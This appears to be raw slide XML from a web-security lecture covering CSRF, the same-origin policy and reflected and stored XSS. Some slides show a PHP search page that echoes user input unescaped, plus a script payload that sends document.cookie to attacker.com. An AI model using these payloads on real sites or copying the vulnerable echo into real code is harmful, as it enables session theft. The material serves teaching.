              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t>Path separation is done for efficiency not security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t>		x.com/A    is only sent the cookies it needs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="191830" indent="-191830">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0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805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Today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room amphi </a:t>
            </a:r>
            <a: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  <a:t>56B:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>13h30-15h45  CM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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break (15h45-15h55) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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room STL 14/15-507:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>15h55-17h00  CM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>17h00-18h00  TP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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>18h00-18h10)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>18h10-19h20  TP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47414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on CSRF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0701" y="1634679"/>
            <a:ext cx="9135428" cy="5397218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Can CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> if cookie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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Can CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> if cookie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httpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Can CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> if gadget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> a frame of a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origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Can CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> 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token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> solution?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94717" y="3506887"/>
            <a:ext cx="8649189" cy="3885581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="202741" indent="-202741" algn="l" defTabSz="1013704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6852" indent="-202741" algn="l" defTabSz="1013704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963" indent="-202741" algn="l" defTabSz="1013704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5074" indent="-202741" algn="l" defTabSz="101370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7815" indent="-152056" algn="l" defTabSz="1013704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0556" indent="-202741" algn="l" defTabSz="101370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23297" indent="-202741" algn="l" defTabSz="101370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6037" indent="-202741" algn="l" defTabSz="101370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28778" indent="-202741" algn="l" defTabSz="101370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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Recall: SOP does not apply to &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>If inside the page from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> we have:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>www.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”&gt;&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>that attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> with CSRF, how attacker server obtains the contacts? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> can XHR to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> but not to  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With HTML5, you can allow XHR cross requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This means: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>before HTML5: for the server of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to get contacts, user should click on a link of the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>after HTML5: the same as before but additionally XHR can work </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial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372249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XSS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Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A3 Code Injection : Cross Site Scripting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803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 injection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Data-tier code injection (SQL)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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-tier code injection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/DOM)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Server-tier code injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2623467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 injection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Injected code can modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on :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Server: for example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err="1" smtClean="0"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injection.  Server side injection is commonly known as just Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client: for example injection of a JavaScript  script  executing on a browser’s victim. Client side injection is commonly known as XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4040962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XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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100" dirty="0"/>
              <a:t>XSS  is present when an attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> scripting code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0"/>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> generated by a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Reflected or Non-Persistent XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Stored  or Persistent XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Others, such as DOM-based attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870606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XSS Vulnerable code  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122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30460" y="1686631"/>
            <a:ext cx="9220015" cy="5818876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1994"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031022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Reflected XSS attack on example 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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3555" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34925" y="1490664"/>
            <a:ext cx="10115550" cy="5394325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zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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Consequence: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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Victim’s Cookie stolen by attacker.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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Possible sensitive private information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体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69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XSS Vulnerable code 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940" y="2280767"/>
            <a:ext cx="9022644" cy="5622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 bwMode="auto">
          <a:xfrm>
            <a:off x="279206" y="3396458"/>
            <a:ext cx="1838479" cy="95630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366" tIns="50683" rIns="101366" bIns="50683" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1013661" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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2037750" y="4193380"/>
            <a:ext cx="1358876" cy="6375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3556495" y="4751227"/>
            <a:ext cx="4556231" cy="656354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101366" tIns="50683" rIns="101366" bIns="50683" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>old messages stored in database in the server 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2037750" y="3077689"/>
            <a:ext cx="1438810" cy="3187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116032" y="3237075"/>
            <a:ext cx="3437157" cy="379355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101366" tIns="50683" rIns="101366" bIns="50683" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user can leave a new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57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Stored XSS attack on example 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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3555" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34925" y="1490664"/>
            <a:ext cx="10115550" cy="53943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>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker leaves a message like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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zh-CN" sz="3100" dirty="0">
